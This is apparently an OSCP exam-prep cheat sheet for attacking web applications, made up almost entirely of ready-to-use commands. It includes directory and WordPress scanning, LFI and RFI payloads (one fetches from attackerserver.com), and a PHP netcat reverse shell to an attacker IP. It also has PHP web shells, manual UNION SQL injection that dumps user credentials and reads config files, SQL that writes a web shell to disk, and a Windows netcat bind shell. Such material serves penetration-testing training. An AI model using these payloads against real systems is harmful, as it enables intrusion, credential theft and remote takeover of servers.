OSCP
Search…
Enumeration and Exploitation
1
HTTP Enumeration
2
----------------------------------------------
3
# Gobuster
4
gobuster -u <targetip> -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e
5
----------------------------------------------
6
# nikto
7
nıkto -h <targetip>
8
----------------------------------------------
9
# curl
10
curl -v -X OPTIONS http://<targetip>/test/
11
curl --upload-file <file name> -v --url <url> -0 --http1.0
12
----------------------------------------------
13
# LFI
14
# PHP Wrapper
15
php://filter/convert.base64-encode/resource=index.php
16
# Null Byte
17
?page=../../../../../../etc/passwd%00
18
----------------------------------------------
19
20
# RFI
21
?page=http://attackerserver.com/evil.txt
22
23
----------------------------------------------
24
# Command Execution
25
<?php system('ls -la');?>
26
<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attackerip> 1234 >/tmp/f');?>
27
28
---------------------------------------------
29
30
# LFI and RCE
31
32
# Inject code execution
33
<?php echo system($_REQUEST["cmd"]);?>
34
35
# Go to LFI vuln and
36
?=…….&cmd=ls
37
38
39
----------------------------------------------
40
# SQL Injection (manual)
41
photoalbum.php?id=1'
42
43
# find the number of columns
44
photoalbum.php?id=1 order by 8
45
46
# Find space to output db
47
?id=1 union select 1,2,3,4,5,6,7,8
48
49
# Get username of the sql-user
50
?id=1 union select 1,2,3,4,user(),6,7,8
51
52
# Get version
53
?id=1 union select 1,2,3,4,version(),6,7,8
54
55
# Get all tables
56
?id=1 union select 1,2,3,4,table_name,6,7,8,9 from information_schema.tables
57
58
# Get all columns from a specific table
59
?id=1 union select 1,2,3, column_name ,5,6,7,8 from information_schema.columns where table_name=‘users’
60
?id=1 union select 1,2,3, group_concat(column_name) ,5,6,7,8 from information_schema.columns() where table_name=‘users’
61
.. 1,2,3, group_concat(user_id, 0x3a, first_name, 0x3a, last_name, 0x3a, email, 0x3a, pass, 0x3a, user_level) ,5,6,7,8 from users
62
63
# view files
64
' union select 1,2,3, load_file(‘/etc/passwd’) ,5,6,7,8 -- -
65
' union select 1,2,3, load_file(‘/var/www/login.php’) ,5,6,7,8 -- -
66
' union select 1,2,3, load_file(‘/var/www/includes/config.inc.php’) ,5,6,7,8 -- -
67
' union select 1,2,3, load_file(‘/var/www/mysqli_connect.php’) ,5,6,7,8 -- -
68
69
# upload files
70
' union select 1,2,3, 'this is a test message' ,5,6,7,8 into outfile '/var/www/test'-- -
71
' union select 1,2,3, load_file('/var/www/test') ,5,6,7,8 -- -
72
' union select null,null,null, "<?php system($_GET['cmd']) ?>" ,5,6,7,8 into outfile '/var/www/shell.php' -- -
73
' union select null,null,null, load_file('/var/www/shell.php') ,5,6,7,8 -- -
74
75
----------------------------------------------
76
77
# wordpress
78
wpscan --url http://.... --log
79
wpscan --url http://... --enumerate u --log
80
wpscan --url http://<targetip> --wordlist wordlist.txt --username example_username
81
http://....../wp-admin
82
http://...../wp-content/uploads/2017/10/file.png
83
84
----------------------------------------------
85
#Windows Command Execution (RFI exploit)
86
87
#Connect via netcat to victim (nc -nv <[IP]> <[PORT]>) and send
88
<?php echo shell_exec("nc.exe -nlvp 4444 -C:\Windows\System32\cmd.exe");?>
89
# on kali call the shell
90
nc -nv ip 4444
91
Copied!
Last modified 1yr ago
Copy link